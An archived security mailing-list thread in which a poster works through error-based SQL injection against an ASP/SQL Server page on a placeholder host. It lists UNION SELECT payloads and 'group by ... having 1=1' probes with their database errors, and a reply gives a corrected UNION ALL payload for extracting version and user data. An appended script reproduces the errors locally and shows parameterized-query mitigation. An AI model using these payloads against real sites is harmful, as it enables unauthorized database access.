WebApp Sec
mailing list archives
RE: SQL Injection: Issue with UNION SELECT ALL
From: "Calderon, Juan Carlos (GE, Corporate, consultant)" <juan.calderon () ge com>
Date: Wed, 9 Jan 2008 12:17:13 -0500
Hello Joe
I guess you made a simple mistake: the right operator is UNION ALL, not SELECT ALL :)
I think this should work
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION ALL SELECT null,null,null--
I suggest you progressively change the nulls one by one by @@version and/or USER to extract the first interesting
pieces of information from the database
Regards,
Juan Carlos Calderon
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Joseph McCray
Sent: Wednesday, 09 January 2008 06:02 a.m.
To: webappsec () securityfocus com
Subject: SQL Injection: Issue with UNION SELECT ALL
I'm really having some trouble here understanding and working through these 2 errors I am getting when attacking a host
via SQL Injection using a UNION SELECT ALL statement. I've listed what I think are the relevant references I've found
on the Internet about these error messages so far, and even though this is probably really simple, for some reason
it's just not clicking for me.
1. Operand type clash: text is incompatible with int
Reference Found:
http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
2. The text, ntext, or image data type cannot be selected as DISTINCT.
References Found:
http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION SELECT ALL
http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662
http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx <-- I am using UNION SELECT ALL
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1
The site was vulnerable to login bypass, so it's really not a matter of being able to "get in", I am asking for help
because I want to understand the errors, and of course make my attack process better.
############################################
# Can't Figure Out This UNION SELECT Stuff #
############################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1,2--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL 1,2,3--
Returns:
Operand type clash: text is incompatible with int
Reference Found:
http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
So I tried this:
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL null--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL null,null--
Returns:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their
target lists
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT ALL null,null,null--
Returns:
The text, ntext, or image data type cannot be selected as DISTINCT.
References Found:
http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION SELECT ALL
http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662 <-- I am using UNION SELECT ALL
http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx <-- I am using UNION SELECT ALL
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1
<-- Hmmm...Need to get a grip on this.
#####################################
# Table/Column Name Enum works fine #
#####################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345
Returns:
Valid page
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345'
Returns:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 having 1=1--
Returns:
Column 'a.id' is invalid in the select list because it is not contained in an aggregate function and there is
no GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id having 1=1--
Returns:
Column 'a.Title' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title having 1=1--
Returns:
Column 'a.Content' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content having 1=1--
Returns:
Column 'a.priority' is invalid in the select list because it is not contained in either an aggregate function
or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content,a.priority having 1=1--
Returns:
Column 'a.html' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content,a.priority,a.html having
1=1--
Returns:
Column 'a.link' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id,a.Title,a.Content,a.priority,a.html,a.link
having 1=1--
Returns:
Column 'a.url' is invalid in the select list because it is not contained in either an aggregate function or the
GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url having 1=1--
Returns:
Column 'a.parent' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent having
1=1--
Returns:
Column 'a.static_index' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index having 1=1--
Returns:
Column 'a.hidden' is invalid in the select list because it is not contained in either an aggregate function or
the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden having 1=1--
Returns:
Column 'a.approved' is invalid in the select list because it is not contained in either an aggregate function
or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved having 1=1--
Returns:
Column 'a.AutoApprove' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove having
1=1--
Returns:
Column 'a.AutoDisapprove' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove
having 1=1--
Returns:
Column 'a.lvl' is invalid in the select list because it is not contained in either an aggregate function or the
GROUP BY clause
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl
having 1=1--
Returns:
Column 'a.membertypes' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes
having 1=1--
Returns:
Column 'a.lastupdated_time' is invalid in the select list because it is not contained in either an aggregate
function or the GROUP BY clause.
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes,a.lastupdated_time
having 1=1--
Returns:
You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...
Microsoft VBScript runtime error '800a01a8'
Object required: 'getrecordset(...)'
You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...
Microsoft VBScript runtime error '800a01a8'
Object required: 'getrecordset(...)'
You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those keyword(s)...
Microsoft VBScript runtime error '800a01a8'
Object required: 'getrecordset(...)'
--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe () learnsecurityonline com
Web: https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games * Simulators
* Challenge Servers * Courses
* Hacking Competitions * Hacklab Access
"The only thing worse than training good employees and losing them
is NOT training your employees and keeping them."
- Zig Ziglar
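
Added example (not part of either message in the thread): a T-SQL script that reproduces the two error messages discussed above on a local SQL Server session, and shows the same input rejected once the value is bound as a typed parameter. The temp table #a, its three columns and its row are constructed for illustration; GO is the SSMS/sqlcmd batch separator.

```sql
-- Constructed table standing in for the thread's aliased table "a" (assumed shape).
CREATE TABLE #a (id int, Title varchar(100), Content text);
INSERT INTO #a (id, Title, Content) VALUES (12345, 'sample title', 'sample body');
GO

-- Case 1: UNION SELECT ALL. Here ALL is only the quantifier of the second
-- SELECT (the default, as opposed to SELECT DISTINCT). The set operator is
-- still a plain UNION, which removes duplicate rows and therefore has to
-- compare the text column. Fails with:
--   The text, ntext, or image data type cannot be selected as DISTINCT.
SELECT id, Title, Content FROM #a WHERE id = 12345
UNION SELECT ALL NULL, NULL, NULL;
GO

-- Case 2: integer literals against a text column. There is no implicit
-- conversion between text and int, so the branches cannot be reconciled.
-- Fails with:
--   Operand type clash: text is incompatible with int
SELECT id, Title, Content FROM #a WHERE id = 12345
UNION ALL SELECT 1, 2, 3;
GO

-- Case 3: UNION ALL keeps duplicates, so no comparison of the text column is
-- needed, and NULL is compatible with every column type. Returns two rows.
SELECT id, Title, Content FROM #a WHERE id = 12345
UNION ALL SELECT NULL, NULL, NULL;
GO

-- Mitigation: bind the request value as an int parameter instead of
-- concatenating it into the statement. The same input is then data, not SQL,
-- and is rejected with a conversion error before the query runs.
DECLARE @input nvarchar(200) = N'12345 UNION ALL SELECT NULL,NULL,NULL--';
EXEC sp_executesql
     N'SELECT id, Title, Content FROM #a WHERE id = @id',
     N'@id int',
     @id = @input;
GO

DROP TABLE #a;
GO
```

The database messages quoted in the thread reached the browser verbatim; returning a generic error page and logging the detail server-side removes that feedback channel even where a query is still built unsafely.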